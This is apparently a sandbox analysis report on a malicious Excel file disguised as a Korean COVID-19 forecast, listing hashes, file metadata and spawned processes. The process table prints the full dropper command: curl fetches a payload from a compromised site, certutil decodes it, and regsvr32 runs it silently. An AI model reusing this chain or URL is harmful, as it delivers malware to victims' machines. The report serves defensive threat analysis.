Field | Value |
---|---|
File name | COVID-19 감염자 및 사망자 예측.xls (Korean; approximately "COVID-19 infection and death forecast.xls") |
Full analysis | https://app.any.run/tasks/c46376c2-6f9f-4157-b834-d6d3e7cbde76 |
Verdict | Malicious activity |
Analysis date | July 13, 2020, 02:38:03 |
OS | Windows 7 Professional Service Pack 1 (build: 7601, 32 bit) |
Tags | — |
Indicators | — |
MIME | application/vnd.ms-excel |
File info | Composite Document File V2 Document, Little Endian, Os: Windows, Version 10.0, Code page: 1252, Author: openpyxl, Last Saved By: USER, Name of Creating Application: Microsoft Excel, Create Time/Date: Wed Jul 8 18:51:14 2020, Last Saved Time/Date: Thu Jul 9 08:16:08 2020, Security: 0 |
MD5 | 268EFE92A6E16C89E62BF0C32113D0C9 |
SHA1 | D42D766A18FC56170FF2978A2BF07BD9CAFAC3E8 |
SHA256 | 00E82DD014370C9DB5A95FD0FD3A5438E4A51F4D64A15DDFFAA77F2E806D2A74 |
SSDEEP | 6144:wxEtjPOtioVjDGUU1qfDlavx+W2QnAbz3t3uWT9qwxfRj1NlSgD8lNSQyURDKVyc:c35v5fjvlZDKoQ949IQgQ9zU+kcC |
Extension | Detected type |
---|---|
.xls | Microsoft Excel sheet (48) |
.xls | Microsoft Excel sheet (alternate) (39.2) |
Property | Value |
---|---|
CompObjUserType | Microsoft Excel 2003 Worksheet |
CompObjUserTypeLen | 31 |
HeadingPairs | — |
TitleOfParts | — |
HyperlinksChanged | No |
SharedDoc | No |
LinksUpToDate | No |
ScaleCrop | No |
AppVersion | 16 |
CodePage | Unicode (UTF-8) |
Security | None |
ModifyDate | 2020:07:09 07:16:08 |
CreateDate | 2020:07:08 17:51:14 |
Software | Microsoft Excel |
LastModifiedBy | USER |
Author | openpyxl |
PID | CMD | Path | Indicators | Parent process | Details |
---|---|---|---|---|---|
2264 | "C:\Program Files\Microsoft Office\Office14\EXCEL.EXE" /dde | C:\Program Files\Microsoft Office\Office14\EXCEL.EXE | — | explorer.exe | User: admin; Company: Microsoft Corporation; Integrity Level: MEDIUM; Description: Microsoft Excel; Version: 14.0.6024.1000 |
2196 | cmd /c curl "http://refeeldominicana.nwideas.com/wp-content/uploads/chimps/category.php" -o "%temp%\1.tmp"&certutil -decode "%temp%\1.tmp" "%temp%\lk.tmp"&cmd /c del "%temp%\1.tmp"&timeout 60&regsvr32 /s "%temp%\lk.tmp" | C:\Windows\system32\cmd.exe | — | EXCEL.EXE | User: admin; Company: Microsoft Corporation; Integrity Level: MEDIUM; Description: Windows Command Processor; Exit code: 3; Version: 6.1.7601.17514 (win7sp1_rtm.101119-1850) |
2644 | certutil -decode "C:\Users\admin\AppData\Local\Temp\1.tmp" "C:\Users\admin\AppData\Local\Temp\lk.tmp" | C:\Windows\system32\certutil.exe | — | cmd.exe | User: admin; Company: Microsoft Corporation; Integrity Level: MEDIUM; Description: CertUtil.exe; Exit code: 2147942402; Version: 6.1.7600.16385 (win7_rtm.090713-1255) |
3812 | cmd /c del "C:\Users\admin\AppData\Local\Temp\1.tmp" | C:\Windows\system32\cmd.exe | — | cmd.exe | User: admin; Company: Microsoft Corporation; Integrity Level: MEDIUM; Description: Windows Command Processor; Exit code: 0; Version: 6.1.7601.17514 (win7sp1_rtm.101119-1850) |
2076 | timeout 60 | C:\Windows\system32\timeout.exe | — | cmd.exe | User: admin; Company: Microsoft Corporation; Integrity Level: MEDIUM; Description: timeout - pauses command processing; Exit code: 0; Version: 6.1.7600.16385 (win7_rtm.090713-1255) |
3220 | regsvr32 /s "C:\Users\admin\AppData\Local\Temp\lk.tmp" | C:\Windows\system32\regsvr32.exe | — | cmd.exe | User: admin; Company: Microsoft Corporation; Integrity Level: MEDIUM; Description: Microsoft(C) Register Server; Exit code: 3; Version: 6.1.7600.16385 (win7_rtm.090713-1255) |
PID | Process | Filename | Type | MD5 | SHA256 |
---|---|---|---|---|---|
2264 | EXCEL.EXE | C:\Users\admin\AppData\Local\Temp\CVRC0B2.tmp.cvr | — | — | — |
2264 | EXCEL.EXE | C:\Users\admin\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.MSO\ACCD76C5.emf | emf | 50BEF0FC1D1741D0CA3BBA19B2ACF71C | C904300F6CCD82506C5D7C3CBEBA44B38430566C99964D1259460CF30DE8AA8E |
2264 | EXCEL.EXE | C:\Users\admin\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.MSO\70D63F69.emf | emf | 3E9FFDD275AC38C8AA6C2E9665E75462 | DFA4168D55AE03F22C0F9D744557CB2FE7BCFF52866FC4B5B26EB682DDA5DA06 |
2264 | EXCEL.EXE | C:\Users\admin\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.MSO\25AA8B08.emf | emf | F53FBE8CD5C53676C283FCA53D319CA0 | 7BB98D54E83677AC7092C789AD5CF8DC3CB82BE002F2CBFC8B094BE37AA7FE87 |
2264 | EXCEL.EXE | C:\Users\admin\AppData\Local\Temp\Excel8.0\MSForms.exd | tlb | 54150BF0F5B95D2F221A6BD75D109D8D | E3FBEC052DAEA62411C6DFEAA645016057A428B33B0C0AACDD293F07DD183F66 |
2264 | EXCEL.EXE | C:\Users\admin\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.MSO\49660E56.emf | emf | F02D196959169825608B8081C866AE6B | 376A571E5584F3F2AEC5FCC21A4C5AC9B53B6E97ABA2EA6811A65C338EBC6483 |
2264 | EXCEL.EXE | C:\Users\admin\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.MSO\FE6FC4D4.emf | emf | 240B486BB1A716ED73194870173AC5C9 | A743ACB7F05CCB615B50B70C47325D723E5A9762E0C2D4976F2C32675966D445 |
2264 | EXCEL.EXE | C:\Users\admin\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.MSO\CA4AFE5F.emf | emf | BD3D13AFA2AB30D1777D6A830594554B | CB38AAC890CE449DA8692D617424F6D72F1CF709C17B0452AC1A2DA5F5E91FD4 |